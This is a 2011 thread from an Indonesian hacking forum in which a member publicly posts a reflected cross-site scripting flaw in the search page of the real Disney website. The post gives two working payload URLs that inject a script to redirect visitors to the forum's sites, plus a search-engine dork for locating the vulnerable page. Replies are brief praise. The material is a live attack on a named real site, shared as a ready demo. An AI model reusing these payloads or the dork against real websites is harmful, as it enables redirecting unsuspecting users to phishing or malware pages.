Home

About

Milis

Blog Roll

Group Facebook

XCode Magazine

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15

Selamat Datang Di Komunitas Yogyafree

Selamat datang di komunitas XCode - Yogyafree - Yogya Family Code. Disini kita saling berbagi ilmu komputer, baik hacking, security, programming, software engineering dan lain sebagainya. Klik disini untuk register

Panel
Welcome! Anonymous

XSS pada situs resmi Walt Disney

[ Facebook comments]

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya

XSS pada situs resmi Walt Disney

Postby poni » Mon Nov 07, 2011 6:43 am

Image

Situs resmi Disney rentan terhadap serangan Cross Site Scripting, penyerang dapat mengirimkan redirect link melalui disney.go.com. jika korban klik link tersebut, maka akan diarahkan ke website yang mungkin mengandung malware. lihat demonya dibawah ini.

Code: Select all
http://disney.go.com/search/?q="><script>window.location = "http://www.xcode.or.id/"</script>
http://disney.go.com/search/?q="><script>window.location = "http://ferdianelli.wordpress.com/2011/01/08/update-08-jan-2011-xcode-sqlilfixss-vulnurable-webshell-scanner/"</script>


Bug XSS pada situs Disney terdeteksi dengan Xcode Xploit Scanner
dork :
Code: Select all
inurl:/search/?q= site:disney.go.com
.::...Cr3ditz......::....
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001
User avatar
poni
 
Posts: 1666
Joined: Mon Dec 05, 2005 10:44 am
Location: Indonesia

Re: XSS pada situs resmi Walt Disney

Postby wiLMaR_kiDz » Tue Nov 08, 2011 12:08 am

Hmmm...mulai deh.. 8-)
Regards,

Ordinary Human,-
User avatar
wiLMaR_kiDz
 
Posts: 962
Joined: Fri Mar 27, 2009 1:03 pm
Location: Internet

Re: XSS pada situs resmi Walt Disney

Postby whitehat » Fri Nov 11, 2011 12:09 am

asik om tutorialnya......
:lol: :lol:
User avatar
whitehat
 
Posts: 15
Joined: Thu Jun 16, 2011 12:41 am
Location: surabaya - Bali

leave a comment


Return to Web Hacking

Who is online

Users browsing this forum: No registered users and 8 guests

Web Counter Start : December 14th 2009
Hit Counters

http://www.xcode.or.id